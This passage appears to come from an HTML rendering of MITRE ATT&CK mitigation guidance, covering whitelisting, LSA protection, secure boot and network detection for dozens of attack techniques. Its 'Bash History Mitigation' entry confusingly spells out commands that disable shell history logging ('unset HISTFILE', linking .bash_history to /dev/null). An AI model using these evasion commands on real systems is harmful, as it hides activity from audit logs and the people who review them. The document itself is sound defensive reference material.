<p>Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to compress files, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
<div class="paragraph">
<p>If network intrusion prevention or data loss prevention tools are set to block specific file types from leaving the network over unencrypted channels, then an adversary may move to an encrypted channel.</p>
</div>
</div>
<div class="sect2">
<h3 id="_applescript_mitigation_t1155"><a class="anchor" href="#_applescript_mitigation_t1155"></a><a class="link" href="#_applescript_mitigation_t1155">AppleScript Mitigation - T1155</a></h3>
<div class="paragraph">
<p>Require that all AppleScript be signed by a trusted developer ID before being executed - this will prevent random AppleScript code from executing.</p>
</div>
</div>
<div class="sect2">
<h3 id="_mshta_mitigation_t1170"><a class="anchor" href="#_mshta_mitigation_t1170"></a><a class="link" href="#_mshta_mitigation_t1170">Mshta Mitigation - T1170</a></h3>
<div class="paragraph">
<p>Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer which have reached end of life. Use application whitelisting configured to block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries.</p>
</div>
</div>
<div class="sect2">
<h3 id="_authentication_package_mitigation_t1131"><a class="anchor" href="#_authentication_package_mitigation_t1131"></a><a class="link" href="#_authentication_package_mitigation_t1131">Authentication Package Mitigation - T1131</a></h3>
<div class="paragraph">
<p>Windows 8.1, Windows Server 2012 R2, and later versions, may make LSA run as a Protected Process Light (PPL) by setting the Registry key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL&lt;/code&gt;, which requires all DLLs loaded by LSA to be signed by Microsoft. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</p>
</div>
</div>
<div class="sect2">
<h3 id="_bash_history_mitigation_t1139"><a class="anchor" href="#_bash_history_mitigation_t1139"></a><a class="link" href="#_bash_history_mitigation_t1139">Bash History Mitigation - T1139</a></h3>
<div class="paragraph">
<p>There are multiple methods of preventing a user&#8217;s command history from being flushed to their .bash_history file, including use of the following commands:
&lt;code&gt;set +o history&lt;/code&gt; and &lt;code&gt;set -o history&lt;/code&gt; to start logging again;
&lt;code&gt;unset HISTFILE&lt;/code&gt; being added to a user&#8217;s .bash_rc file; and
&lt;code&gt;ln -s /dev/null ~/.bash_history&lt;/code&gt; to write commands to &lt;code&gt;/dev/null&lt;/code&gt;instead.</p>
</div>
</div>
<div class="sect2">
<h3 id="_port_monitors_mitigation_t1013"><a class="anchor" href="#_port_monitors_mitigation_t1013"></a><a class="link" href="#_port_monitors_mitigation_t1013">Port Monitors Mitigation - T1013</a></h3>
<div class="paragraph">
<p>Identify and block potentially malicious software that may persist in this manner by using whitelisting (Citation: Beechey 2010) tools capable of monitoring DLL loads by processes running under SYSTEM permissions.</p>
</div>
</div>
<div class="sect2">
<h3 id="_image_file_execution_options_injection_mitigation_t1183"><a class="anchor" href="#_image_file_execution_options_injection_mitigation_t1183"></a><a class="link" href="#_image_file_execution_options_injection_mitigation_t1183">Image File Execution Options Injection Mitigation - T1183</a></h3>
<div class="paragraph">
<p>This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating all IFEO will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. (Citation: Microsoft IFEOorMalware July 2015) Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be executed through IFEO by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown executables.</p>
</div>
</div>
<div class="sect2">
<h3 id="_lc_load_dylib_addition_mitigation_t1161"><a class="anchor" href="#_lc_load_dylib_addition_mitigation_t1161"></a><a class="link" href="#_lc_load_dylib_addition_mitigation_t1161">LC_LOAD_DYLIB Addition Mitigation - T1161</a></h3>
<div class="paragraph">
<p>Enforce that all binaries be signed by the correct Apple Developer IDs, and whitelist applications via known hashes. Binaries can also be baselined for what dynamic libraries they require, and if an app requires a new dynamic library that wasnt included as part of an update, it should be investigated.</p>
</div>
</div>
<div class="sect2">
<h3 id="_man_in_the_browser_mitigation_t1185"><a class="anchor" href="#_man_in_the_browser_mitigation_t1185"></a><a class="link" href="#_man_in_the_browser_mitigation_t1185">Man in the Browser Mitigation - T1185</a></h3>
<div class="paragraph">
<p>Since browser pivoting requires a high integrity process to launch from, restricting user permissions and addressing Privilege Escalation and Bypass User Account Control opportunities can limit the exposure to this technique.</p>
</div>
<div class="paragraph">
<p>Close all browser sessions regularly and when they are no longer needed.</p>
</div>
</div>
<div class="sect2">
<h3 id="_screensaver_mitigation_t1180"><a class="anchor" href="#_screensaver_mitigation_t1180"></a><a class="link" href="#_screensaver_mitigation_t1180">Screensaver Mitigation - T1180</a></h3>
<div class="paragraph">
<p>Block .scr files from being executed from non-standard locations. Set Group Policy to force users to have a dedicated screensaver where local changes should not override the settings to prevent changes. Use Group Policy to disable screensavers if they are unnecessary. (Citation: TechNet Screensaver GP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_accessibility_features_mitigation_t1015"><a class="anchor" href="#_accessibility_features_mitigation_t1015"></a><a class="link" href="#_accessibility_features_mitigation_t1015">Accessibility Features Mitigation - T1015</a></h3>
<div class="paragraph">
<p>To use this technique remotely, an adversary must use it in conjunction with RDP. Ensure that Network Level Authentication is enabled to force the remote desktop session to authenticate before the session is created and the login screen displayed. It is enabled by default on Windows Vista and later. (Citation: TechNet RDP NLA)</p>
</div>
<div class="paragraph">
<p>If possible, use a Remote Desktop Gateway to manage connections and security configuration of RDP within a network. (Citation: TechNet RDP Gateway)</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be executed by an adversary with this technique by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_bootkit_mitigation_t1067"><a class="anchor" href="#_bootkit_mitigation_t1067"></a><a class="link" href="#_bootkit_mitigation_t1067">Bootkit Mitigation - T1067</a></h3>
<div class="paragraph">
<p>Ensure proper permissions are in place to help prevent adversary access to privileged accounts necessary to perform this action. Use Trusted Platform Module technology and a secure or trusted boot process to prevent system integrity from being compromised. (Citation: TCG Trusted Platform Module) (Citation: TechNet Secure Boot Process)</p>
</div>
</div>
<div class="sect2">
<h3 id="_valid_accounts_mitigation_t1078"><a class="anchor" href="#_valid_accounts_mitigation_t1078"></a><a class="link" href="#_valid_accounts_mitigation_t1078">Valid Accounts Mitigation - T1078</a></h3>
<div class="paragraph">
<p>Take measures to detect or prevent techniques such as Credential Dumping or installation of keyloggers to acquire credentials through Input Capture. Limit credential overlap across systems to prevent access if account credentials are obtained. Ensure that local administrator accounts have complex, unique passwords across all systems on the network. Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled and use of accounts is segmented, as this is often equivalent to having a local administrator account with the same password on all systems. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft Securing Privileged Access). Audit domain and local accounts as well as their permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. (Citation: TechNet Credential Theft) (Citation: TechNet Least Privilege)</p>
</div>
</div>
<div class="sect2">
<h3 id="_browser_extensions_mitigation_t1176"><a class="anchor" href="#_browser_extensions_mitigation_t1176"></a><a class="link" href="#_browser_extensions_mitigation_t1176">Browser Extensions Mitigation - T1176</a></h3>
<div class="paragraph">
<p>Only install browser extensions from trusted sources that can be verified. Ensure extensions that are installed are the intended ones as many malicious extensions will masquerade as legitimate ones.</p>
</div>
<div class="paragraph">
<p>Browser extensions for some browsers can be controlled through Group Policy. Set a browser extension white or black list as appropriate for your security policy. (Citation: Technospot Chrome Extensions GP)</p>
</div>
<div class="paragraph">
<p>Change settings to prevent the browser from installing extensions without sufficient permissions.</p>
</div>
<div class="paragraph">
<p>Close out all browser sessions when finished using them.</p>
</div>
</div>
<div class="sect2">
<h3 id="_disabling_security_tools_mitigation_t1089"><a class="anchor" href="#_disabling_security_tools_mitigation_t1089"></a><a class="link" href="#_disabling_security_tools_mitigation_t1089">Disabling Security Tools Mitigation - T1089</a></h3>
<div class="paragraph">
<p>Ensure proper process, registry, and file permissions are in place to prevent adversaries from disabling or interfering with security services.</p>
</div>
</div>
<div class="sect2">
<h3 id="_query_registry_mitigation_t1012"><a class="anchor" href="#_query_registry_mitigation_t1012"></a><a class="link" href="#_query_registry_mitigation_t1012">Query Registry Mitigation - T1012</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information within the Registry, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_bash_profile_and_bashrc_mitigation_t1156"><a class="anchor" href="#_bash_profile_and_bashrc_mitigation_t1156"></a><a class="link" href="#_bash_profile_and_bashrc_mitigation_t1156">.bash_profile and .bashrc Mitigation - T1156</a></h3>
<div class="paragraph">
<p>Making these files immutable and only changeable by certain administrators will limit the ability for adversaries to easily create user level persistence.</p>
</div>
</div>
<div class="sect2">
<h3 id="_system_firmware_mitigation_t1019"><a class="anchor" href="#_system_firmware_mitigation_t1019"></a><a class="link" href="#_system_firmware_mitigation_t1019">System Firmware Mitigation - T1019</a></h3>
<div class="paragraph">
<p>Prevent adversary access to privileged accounts or access necessary to perform this technique. Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. Patch the BIOS and EFI as necessary. Use Trusted Platform Module technology. (Citation: TCG Trusted Platform Module)</p>
</div>
</div>
<div class="sect2">
<h3 id="_multiband_communication_mitigation_t1026"><a class="anchor" href="#_multiband_communication_mitigation_t1026"></a><a class="link" href="#_multiband_communication_mitigation_t1026">Multiband Communication Mitigation - T1026</a></h3>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)</p>
</div>
</div>
<div class="sect2">
<h3 id="_remote_system_discovery_mitigation_t1018"><a class="anchor" href="#_remote_system_discovery_mitigation_t1018"></a><a class="link" href="#_remote_system_discovery_mitigation_t1018">Remote System Discovery Mitigation - T1018</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information on remotely available systems, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_file_and_directory_discovery_mitigation_t1083"><a class="anchor" href="#_file_and_directory_discovery_mitigation_t1083"></a><a class="link" href="#_file_and_directory_discovery_mitigation_t1083">File and Directory Discovery Mitigation - T1083</a></h3>
<div class="paragraph">
<p>File system activity is a common part of an operating system, so it is unlikely that mitigation would be appropriate for this technique. It may still be beneficial to identify and block unnecessary system utilities or potentially malicious software by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_file_system_permissions_weakness_mitigation_t1044"><a class="anchor" href="#_file_system_permissions_weakness_mitigation_t1044"></a><a class="link" href="#_file_system_permissions_weakness_mitigation_t1044">File System Permissions Weakness Mitigation - T1044</a></h3>
<div class="paragraph">
<p>Use auditing tools capable of detecting file system permissions abuse opportunities on systems within an enterprise and correct them. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service binary target path locations. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for service file system permissions weaknesses. (Citation: Powersploit)</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be executed through abuse of file, directory, and service permissions by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown programs. Deny execution from user directories such as file download directories and temp directories where able. (Citation: Seclists Kanthak 7zip Installer)</p>
</div>
<div class="paragraph">
<p>Turn off UAC&#8217;s privilege elevation for standard users &lt;code&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]&lt;/code&gt;to automatically deny elevation requests, add: &lt;code&gt;"ConsentPromptBehaviorUser"=dword:00000000&lt;/code&gt; (Citation: Seclists Kanthak 7zip Installer). Consider enabling installer detection for all users by adding: &lt;code&gt;"EnableInstallerDetection"=dword:00000001&lt;/code&gt;. This will prompt for a password for installation and also log the attempt. To disable installer detection, instead add: &lt;code&gt;"EnableInstallerDetection"=dword:00000000&lt;/code&gt;. This may prevent potential elevation of privileges through exploitation during the process of UAC detecting the installer, but will allow the installation process to continue without being logged.</p>
</div>
</div>
<div class="sect2">
<h3 id="_service_execution_mitigation_t1035"><a class="anchor" href="#_service_execution_mitigation_t1035"></a><a class="link" href="#_service_execution_mitigation_t1035">Service Execution Mitigation - T1035</a></h3>
<div class="paragraph">
<p>Ensure that permissions disallow services that run at a higher permissions level from being created or interacted with by a user with a lower permission level. Also ensure that high permission level service binaries cannot be replaced or modified by users with a lower permission level.</p>
</div>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to interact with Windows services, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_setuid_and_setgid_mitigation_t1166"><a class="anchor" href="#_setuid_and_setgid_mitigation_t1166"></a><a class="link" href="#_setuid_and_setgid_mitigation_t1166">Setuid and Setgid Mitigation - T1166</a></h3>
<div class="paragraph">
<p>Applications with known vulnerabilities or known shell escapes should not have the setuid or setgid bits set to reduce potential damage if an application is compromised.</p>
</div>
</div>
<div class="sect2">
<h3 id="_trap_mitigation_t1154"><a class="anchor" href="#_trap_mitigation_t1154"></a><a class="link" href="#_trap_mitigation_t1154">Trap Mitigation - T1154</a></h3>
<div class="paragraph">
<p>Due to potential legitimate uses of trap commands, it&#8217;s may be difficult to mitigate use of this technique.</p>
</div>
</div>
<div class="sect2">
<h3 id="_communication_through_removable_media_mitigation_t1092"><a class="anchor" href="#_communication_through_removable_media_mitigation_t1092"></a><a class="link" href="#_communication_through_removable_media_mitigation_t1092">Communication Through Removable Media Mitigation - T1092</a></h3>
<div class="paragraph">
<p>Disable Autorun if it is unnecessary. (Citation: Microsoft Disable Autorun) Disallow or restrict removable media at an organizational policy level if they are not required for business operations. (Citation: TechNet Removable Media Control)</p>
</div>
</div>
<div class="sect2">
<h3 id="_two_factor_authentication_interception_mitigation_t1111"><a class="anchor" href="#_two_factor_authentication_interception_mitigation_t1111"></a><a class="link" href="#_two_factor_authentication_interception_mitigation_t1111">Two-Factor Authentication Interception Mitigation - T1111</a></h3>
<div class="paragraph">
<p>Remove smart cards when not in use. Protect devices and services used to transmit and receive out-of-band codes.</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be used to intercept 2FA credentials on a system by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_lsass_driver_mitigation_t1177"><a class="anchor" href="#_lsass_driver_mitigation_t1177"></a><a class="link" href="#_lsass_driver_mitigation_t1177">LSASS Driver Mitigation - T1177</a></h3>
<div class="paragraph">
<p>On Windows 8.1 and Server 2012 R2, enable LSA Protection by setting the Registry key &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL&lt;/code&gt; to &lt;code&gt;dword:00000001&lt;/code&gt;. (Citation: Microsoft LSA Protection Mar 2014) LSA Protection ensures that LSA plug-ins and drivers are only loaded if they are digitally signed with a Microsoft signature and adhere to the Microsoft Security Development Lifecycle (SDL) process guidance.</p>
</div>
<div class="paragraph">
<p>On Windows 10 and Server 2016, enable Windows Defender Credential Guard (Citation: Microsoft Enable Cred Guard April 2017) to run lsass.exe in an isolated virtualized environment without any device drivers. (Citation: Microsoft Credential Guard April 2017)</p>
</div>
<div class="paragraph">
<p>Ensure safe DLL search mode is enabled &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode&lt;/code&gt; to mitigate risk that lsass.exe loads a malicious code library. (Citation: Microsoft DLL Security)</p>
</div>
</div>
<div class="sect2">
<h3 id="_standard_non_application_layer_protocol_mitigation_t1095"><a class="anchor" href="#_standard_non_application_layer_protocol_mitigation_t1095"></a><a class="link" href="#_standard_non_application_layer_protocol_mitigation_t1095">Standard Non-Application Layer Protocol Mitigation - T1095</a></h3>
<div class="paragraph">
<p>Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports and through proper network gateway systems.</p>
</div>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)</p>
</div>
</div>
<div class="sect2">
<h3 id="_data_transfer_size_limits_mitigation_t1030"><a class="anchor" href="#_data_transfer_size_limits_mitigation_t1030"></a><a class="link" href="#_data_transfer_size_limits_mitigation_t1030">Data Transfer Size Limits Mitigation - T1030</a></h3>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools. (Citation: University of Birmingham C2)</p>
</div>
</div>
<div class="sect2">
<h3 id="_appinit_dlls_mitigation_t1103"><a class="anchor" href="#_appinit_dlls_mitigation_t1103"></a><a class="link" href="#_appinit_dlls_mitigation_t1103">AppInit DLLs Mitigation - T1103</a></h3>
<div class="paragraph">
<p>Upgrade to Windows 8 or later and enable secure boot.</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be executed through AppInit DLLs by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.</p>
</div>
</div>
<div class="sect2">
<h3 id="_installutil_mitigation_t1118"><a class="anchor" href="#_installutil_mitigation_t1118"></a><a class="link" href="#_installutil_mitigation_t1118">InstallUtil Mitigation - T1118</a></h3>
<div class="paragraph">
<p>InstallUtil may not be necessary within a given environment. Use application whitelisting configured to block execution of InstallUtil.exe if it is not required for a given system or network to prevent potential misuse by adversaries.</p>
</div>
</div>
<div class="sect2">
<h3 id="_shortcut_modification_mitigation_t1023"><a class="anchor" href="#_shortcut_modification_mitigation_t1023"></a><a class="link" href="#_shortcut_modification_mitigation_t1023">Shortcut Modification Mitigation - T1023</a></h3>
<div class="paragraph">
<p>Limit permissions for who can create symbolic links in Windows to appropriate groups such as Administrators and necessary groups for virtualization. This can be done through GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment: Create symbolic links. (Citation: UCF STIG Symbolic Links)</p>
</div>
<div class="paragraph">
<p>Identify and block unknown, potentially malicious software that may be executed through shortcut modification by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_custom_command_and_control_protocol_mitigation_t1094"><a class="anchor" href="#_custom_command_and_control_protocol_mitigation_t1094"></a><a class="link" href="#_custom_command_and_control_protocol_mitigation_t1094">Custom Command and Control Protocol Mitigation - T1094</a></h3>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)</p>
</div>
</div>
<div class="sect2">
<h3 id="_automated_exfiltration_mitigation_t1020"><a class="anchor" href="#_automated_exfiltration_mitigation_t1020"></a><a class="link" href="#_automated_exfiltration_mitigation_t1020">Automated Exfiltration Mitigation - T1020</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities, scripts, or potentially malicious software that may be used to transfer data outside of a network, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_change_default_file_association_mitigation_t1042"><a class="anchor" href="#_change_default_file_association_mitigation_t1042"></a><a class="link" href="#_change_default_file_association_mitigation_t1042">Change Default File Association Mitigation - T1042</a></h3>
<div class="paragraph">
<p>Direct mitigation of this technique is not recommended since it is a legitimate function that can be performed by users for software preferences. Follow Microsoft&#8217;s best practices for file associations. (Citation: MSDN File Associations)</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be executed by this technique using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_peripheral_device_discovery_mitigation_t1120"><a class="anchor" href="#_peripheral_device_discovery_mitigation_t1120"></a><a class="link" href="#_peripheral_device_discovery_mitigation_t1120">Peripheral Device Discovery Mitigation - T1120</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about peripheral devices, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_standard_application_layer_protocol_mitigation_t1071"><a class="anchor" href="#_standard_application_layer_protocol_mitigation_t1071"></a><a class="link" href="#_standard_application_layer_protocol_mitigation_t1071">Standard Application Layer Protocol Mitigation - T1071</a></h3>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and will be different across various malware families and versions. Adversaries will likely change tool signatures over time or construct protocols in such a way to avoid detection by common defensive tools. (Citation: University of Birmingham C2)</p>
</div>
</div>
<div class="sect2">
<h3 id="_histcontrol_mitigation_t1148"><a class="anchor" href="#_histcontrol_mitigation_t1148"></a><a class="link" href="#_histcontrol_mitigation_t1148">HISTCONTROL Mitigation - T1148</a></h3>
<div class="paragraph">
<p>Prevent users from changing the &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable (Citation: Securing bash history). Also, make sure that the &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable is set to “ignoredup” instead of “ignoreboth” or “ignorespace”.</p>
</div>
</div>
<div class="sect2">
<h3 id="_input_capture_mitigation_t1056"><a class="anchor" href="#_input_capture_mitigation_t1056"></a><a class="link" href="#_input_capture_mitigation_t1056">Input Capture Mitigation - T1056</a></h3>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be used to acquire credentials or information from the user by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
<div class="paragraph">
<p>In cases where this behavior is difficult to detect or mitigate, efforts can be made to lessen some of the impact that might result from an adversary acquiring credential information. It is also good practice to follow mitigation recommendations for adversary use of Valid Accounts.</p>
</div>
</div>
<div class="sect2">
<h3 id="_login_item_mitigation_t1162"><a class="anchor" href="#_login_item_mitigation_t1162"></a><a class="link" href="#_login_item_mitigation_t1162">Login Item Mitigation - T1162</a></h3>
<div class="paragraph">
<p>Restrict users from being able to create their own login items. Additionally, holding the shift key during login prevents apps from opening automatically (Citation: Re-Open windows on Mac).</p>
</div>
</div>
<div class="sect2">
<h3 id="_security_support_provider_mitigation_t1101"><a class="anchor" href="#_security_support_provider_mitigation_t1101"></a><a class="link" href="#_security_support_provider_mitigation_t1101">Security Support Provider Mitigation - T1101</a></h3>
<div class="paragraph">
<p>Windows 8.1, Windows Server 2012 R2, and later versions may make LSA run as a Protected Process Light (PPL) by setting the Registry key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL&lt;/code&gt;, which requires all SSP DLLs to be signed by Microsoft. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</p>
</div>
</div>
<div class="sect2">
<h3 id="_ssh_hijacking_mitigation_t1184"><a class="anchor" href="#_ssh_hijacking_mitigation_t1184"></a><a class="link" href="#_ssh_hijacking_mitigation_t1184">SSH Hijacking Mitigation - T1184</a></h3>
<div class="paragraph">
<p>Ensure SSH key pairs have strong passwords and refrain from using key-store technologies such as ssh-agent unless they are properly protected. Ensure that all private keys are stored securely in locations where only the legitimate owner has access to with strong passwords and are rotated frequently. Ensure proper file permissions are set and harden system to prevent root privilege escalation opportunities. Do not allow remote access via SSH as root or other privileged accounts. Ensure that agent forwarding is disabled on systems that do not explicitly require this feature to prevent misuse. (Citation: Symantec SSH and ssh-agent)</p>
</div>
</div>
<div class="sect2">
<h3 id="_process_discovery_mitigation_t1057"><a class="anchor" href="#_process_discovery_mitigation_t1057"></a><a class="link" href="#_process_discovery_mitigation_t1057">Process Discovery Mitigation - T1057</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about processes, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_replication_through_removable_media_mitigation_t1091"><a class="anchor" href="#_replication_through_removable_media_mitigation_t1091"></a><a class="link" href="#_replication_through_removable_media_mitigation_t1091">Replication Through Removable Media Mitigation - T1091</a></h3>
<div class="paragraph">
<p>Disable Autorun if it is unnecessary. (Citation: Microsoft Disable Autorun) Disallow or restrict removable media at an organizational policy level if it is not required for business operations. (Citation: TechNet Removable Media Control)</p>
</div>
<div class="paragraph">
<p>Identify potentially malicious software that may be used to infect removable media or may result from tainted removable media, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_scheduled_transfer_mitigation_t1029"><a class="anchor" href="#_scheduled_transfer_mitigation_t1029"></a><a class="link" href="#_scheduled_transfer_mitigation_t1029">Scheduled Transfer Mitigation - T1029</a></h3>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools. (Citation: University of Birmingham C2)</p>
</div>
</div>
<div class="sect2">
<h3 id="_hypervisor_mitigation_t1062"><a class="anchor" href="#_hypervisor_mitigation_t1062"></a><a class="link" href="#_hypervisor_mitigation_t1062">Hypervisor Mitigation - T1062</a></h3>
<div class="paragraph">
<p>Prevent adversary access to privileged accounts necessary to install a hypervisor.</p>
</div>
</div>
<div class="sect2">
<h3 id="_automated_collection_mitigation_t1119"><a class="anchor" href="#_automated_collection_mitigation_t1119"></a><a class="link" href="#_automated_collection_mitigation_t1119">Automated Collection Mitigation - T1119</a></h3>
<div class="paragraph">
<p>Encryption and off-system storage of sensitive information may be one way to mitigate collection of files, but may not stop an adversary from acquiring the information if an intrusion persists over a long period of time and the adversary is able to discover and access the data through other means. A keylogger installed on a system may be able to intercept passwords through Input Capture and be used to decrypt protected documents that an adversary may have collected. Strong passwords should be used to prevent offline cracking of encrypted documents through Brute Force techniques.</p>
</div>
<div class="paragraph">
